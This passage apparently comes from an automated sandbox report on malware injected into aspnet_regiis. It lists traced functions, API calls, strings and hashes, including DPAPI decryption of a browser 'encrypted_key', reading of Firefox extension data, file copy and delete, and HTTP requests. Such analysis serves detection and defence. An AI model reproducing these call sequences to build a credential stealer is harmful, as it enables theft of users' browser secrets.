                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3225020163-0
                                                                                                                                                                              • Opcode ID: bddeea250821ca041d213655c51455dddf7744363902a002a17b170c32d8188c
                                                                                                                                                                              • Instruction ID: 561e4758322a16745df939e1c564d0baf49081787e1535986774b36f14628ec3
                                                                                                                                                                              • Opcode Fuzzy Hash: bddeea250821ca041d213655c51455dddf7744363902a002a17b170c32d8188c
                                                                                                                                                                              • Instruction Fuzzy Hash: 38F03076A80314FBEB105F91DC0AFAA7B7CEB48715F140694F602B5080E7B1DAA09B60
                                                                                                                                                                              Function 02A083D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87libraryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetEnvironmentVariableA.KERNELBASE(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,02A0DB0A), ref: 02A083F2
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A10549: lstrlen.KERNEL32(?,?,02A17174,02A366CF,02A366CE,?,?,?,?,02A1858F), ref: 02A1054F
                                                                                                                                                                                • Part of subcall function 02A10549: lstrcpy.KERNEL32(00000000,00000000), ref: 02A10581
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                              • SetEnvironmentVariableA.KERNEL32(?,02A37194,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,02A367C3,?,?,?,?,?,?,?,?,02A0DB0A), ref: 02A08447
                                                                                                                                                                              • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,02A0DB0A), ref: 02A0845B
                                                                                                                                                                              Strings
                                                                                                                                                                              • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 02A083E6, 02A083EB, 02A08405
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                                                                                                              • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                                                                                                                                              • API String ID: 2929475105-1435860445
                                                                                                                                                                              • Opcode ID: 8a475a0e6769f77ac62fb906435b5f40d136647f708428b44fe89ba06b1fbb26
                                                                                                                                                                              • Instruction ID: a54f6066ca0a8bc023de53d821c6a08ef24a9413ce47fdec55385e6fb4fbc4f2
                                                                                                                                                                              • Opcode Fuzzy Hash: 8a475a0e6769f77ac62fb906435b5f40d136647f708428b44fe89ba06b1fbb26
                                                                                                                                                                              • Instruction Fuzzy Hash: 9D314D71DC07349FCB12AF68FE8165DBBB2EB487107004665E809B31A0DB35AAE5CF85
                                                                                                                                                                              Function 02A16DC6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55stringCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • __EH_prolog3_catch.LIBCMT ref: 02A16DCD
                                                                                                                                                                              • lstrlen.KERNEL32(?,0000001C), ref: 02A16DD8
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 02A16E5C
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: H_prolog3_catchlstrlen
                                                                                                                                                                              • String ID: ERROR
                                                                                                                                                                              • API String ID: 591506033-2861137601
                                                                                                                                                                              • Opcode ID: cea891fa1ee6cc96d1f5d1beff13e8cdc6f689110ecedaf7b5dfa51dea563793
                                                                                                                                                                              • Instruction ID: a3a1945a1bf4cf02e7a95f12375865e30afee70edd875f3829eacb83a0225768
                                                                                                                                                                              • Opcode Fuzzy Hash: cea891fa1ee6cc96d1f5d1beff13e8cdc6f689110ecedaf7b5dfa51dea563793
                                                                                                                                                                              • Instruction Fuzzy Hash: EA112E71C806199FCB40FFB8D645A9DBBB6BF14320B504621D819E7550EF31EAA98FC1
                                                                                                                                                                              Function 02A0B332 Relevance: 6.2, APIs: 4, Instructions: 196filestringCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A11C4A: GetSystemTime.KERNEL32(?,02A36701,?), ref: 02A11C79
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 02A0B3D7
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A0B529
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A0B544
                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 02A0B596
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 211194620-0
                                                                                                                                                                              • Opcode ID: b8575b37e907f5f32269c0eca655e443c332c4e7f407b2afabb2f6fbaebae403
                                                                                                                                                                              • Instruction ID: 6a4bb35669790de0bdefa419be65da1b02e9cb240cb36c94f0f7e490f9850d28
                                                                                                                                                                              • Opcode Fuzzy Hash: b8575b37e907f5f32269c0eca655e443c332c4e7f407b2afabb2f6fbaebae403
                                                                                                                                                                              • Instruction Fuzzy Hash: 3471F932D802299BCF01FBA4EE85ADDB776BF04364F514421E905B71A0DF30AE598FA1
                                                                                                                                                                              Function 02A0D40E Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 125stringCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A10519: lstrcpy.KERNEL32(00000000,?), ref: 02A10538
                                                                                                                                                                                • Part of subcall function 02A07FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,02A0E756,?,?,?), ref: 02A07FC7
                                                                                                                                                                                • Part of subcall function 02A07FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,02A0E756,?,?,?), ref: 02A07FDE
                                                                                                                                                                                • Part of subcall function 02A07FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,02A0E756,?,?,?), ref: 02A07FF5
                                                                                                                                                                                • Part of subcall function 02A07FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,02A0E756,?,?,?), ref: 02A0800C
                                                                                                                                                                                • Part of subcall function 02A07FAC: CloseHandle.KERNEL32(?,?,?,?,?,02A0E756,?,?,?), ref: 02A08034
                                                                                                                                                                                • Part of subcall function 02A11E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,02A16931,?), ref: 02A11E37
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,?,02A37538,02A3688A), ref: 02A0D49F
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A0D4B2
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
                                                                                                                                                                              • String ID: ^userContextId=4294967295$moz-extension+++
                                                                                                                                                                              • API String ID: 161838763-3310892237
                                                                                                                                                                              • Opcode ID: e785e764b9eaf86aba972b57d570eab516d07612eeb391285fb849996aa151fc
                                                                                                                                                                              • Instruction ID: f7cd7e4c0edec5784dd746d782e4cc8f3a61b1dcaa60c42004fa077d8eddf04b
                                                                                                                                                                              • Opcode Fuzzy Hash: e785e764b9eaf86aba972b57d570eab516d07612eeb391285fb849996aa151fc
                                                                                                                                                                              • Instruction Fuzzy Hash: 4641D636D801299BCF01FBA4EE85ACDB7B6AF14364B414120ED05B7190DF64AE598FE1
                                                                                                                                                                              Function 02A0819F Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 77COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A07FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,02A0E756,?,?,?), ref: 02A07FC7
                                                                                                                                                                                • Part of subcall function 02A07FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,02A0E756,?,?,?), ref: 02A07FDE
                                                                                                                                                                                • Part of subcall function 02A07FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,02A0E756,?,?,?), ref: 02A07FF5
                                                                                                                                                                                • Part of subcall function 02A07FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,02A0E756,?,?,?), ref: 02A0800C
                                                                                                                                                                                • Part of subcall function 02A07FAC: CloseHandle.KERNEL32(?,?,?,?,?,02A0E756,?,?,?), ref: 02A08034
                                                                                                                                                                                • Part of subcall function 02A11E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,02A16931,?), ref: 02A11E37
                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,02A0CC90,?,?), ref: 02A081E5
                                                                                                                                                                                • Part of subcall function 02A08048: CryptStringToBinaryA.CRYPT32(02A06724,00000000,00000001,00000000,?,00000000,00000000), ref: 02A08060
                                                                                                                                                                                • Part of subcall function 02A08048: LocalAlloc.KERNEL32(00000040,?,?,?,02A06724,?), ref: 02A0806E
                                                                                                                                                                                • Part of subcall function 02A08048: CryptStringToBinaryA.CRYPT32(02A06724,00000000,00000001,00000000,?,00000000,00000000), ref: 02A08084
                                                                                                                                                                                • Part of subcall function 02A08048: LocalFree.KERNEL32(?,?,?,02A06724,?), ref: 02A08093
                                                                                                                                                                                • Part of subcall function 02A080A1: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,02A0823B), ref: 02A080C4
                                                                                                                                                                                • Part of subcall function 02A080A1: LocalAlloc.KERNEL32(00000040,02A0823B,?,?,02A0823B,02A0CB95,?,?,?,?,?,?,?,02A0CC90,?,?), ref: 02A080D8
                                                                                                                                                                                • Part of subcall function 02A080A1: LocalFree.KERNEL32(02A0CB95,?,?,02A0823B,02A0CB95,?,?,?,?,?,?,?,02A0CC90,?,?), ref: 02A080FD
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Local$Alloc$CryptFile$BinaryFreeString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                                                                                                                                                              • String ID: $"encrypted_key":"$DPAPI
                                                                                                                                                                              • API String ID: 2311102621-738592651
                                                                                                                                                                              • Opcode ID: 31dee6bf2b8fa23410cd8e7e69caaf7c7fad09b48b0716e2e7a070d41a1d7272
                                                                                                                                                                              • Instruction ID: b5e738e9b84a86547e134ca8149a3c5f2667cbde47e5994198c3cdde0e5fcd1b
                                                                                                                                                                              • Opcode Fuzzy Hash: 31dee6bf2b8fa23410cd8e7e69caaf7c7fad09b48b0716e2e7a070d41a1d7272
                                                                                                                                                                              • Instruction Fuzzy Hash: 4B219232E80209AFDF14EB94EDC0ADEB779AF49360F104565E920A71D0DF34EE49CA54
                                                                                                                                                                              Function 02A1683E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A10519: lstrcpy.KERNEL32(00000000,?), ref: 02A10538
                                                                                                                                                                                • Part of subcall function 02A06963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 02A069C5
                                                                                                                                                                                • Part of subcall function 02A06963: StrCmpCA.SHLWAPI(?), ref: 02A069DF
                                                                                                                                                                                • Part of subcall function 02A06963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02A06A0E
                                                                                                                                                                                • Part of subcall function 02A06963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 02A06A4D
                                                                                                                                                                                • Part of subcall function 02A06963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 02A06A7D
                                                                                                                                                                                • Part of subcall function 02A06963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 02A06A88
                                                                                                                                                                                • Part of subcall function 02A06963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 02A06AAC
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 02A16873
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: HttpInternet$OpenRequest$ConnectInfoOptionQuerySendlstrcpy
                                                                                                                                                                              • String ID: ERROR$ERROR
                                                                                                                                                                              • API String ID: 3086566538-2579291623
                                                                                                                                                                              • Opcode ID: 7e6b29f983d18becd28695437ff828f3c5ee3ad6c2023122b6263b764624dfb5
                                                                                                                                                                              • Instruction ID: 88cf2b0ccdbdfc42a9aabbcfc129885df2645238f701e07a6eccf83cb9dff1ef
                                                                                                                                                                              • Opcode Fuzzy Hash: 7e6b29f983d18becd28695437ff828f3c5ee3ad6c2023122b6263b764624dfb5
                                                                                                                                                                              • Instruction Fuzzy Hash: 3B018635D80218ABCB21FF74E985ACD33AE6F10720B444161FD25E3151EF30E9098ED1
                                                                                                                                                                              Function 02A16E97 Relevance: 4.6, APIs: 3, Instructions: 70sleepsynchronizationthreadCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • Sleep.KERNEL32(000003E8,?,?), ref: 02A16EFE
                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02A16DC6,?,00000000,00000000), ref: 02A16F36
                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 02A16F3E
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
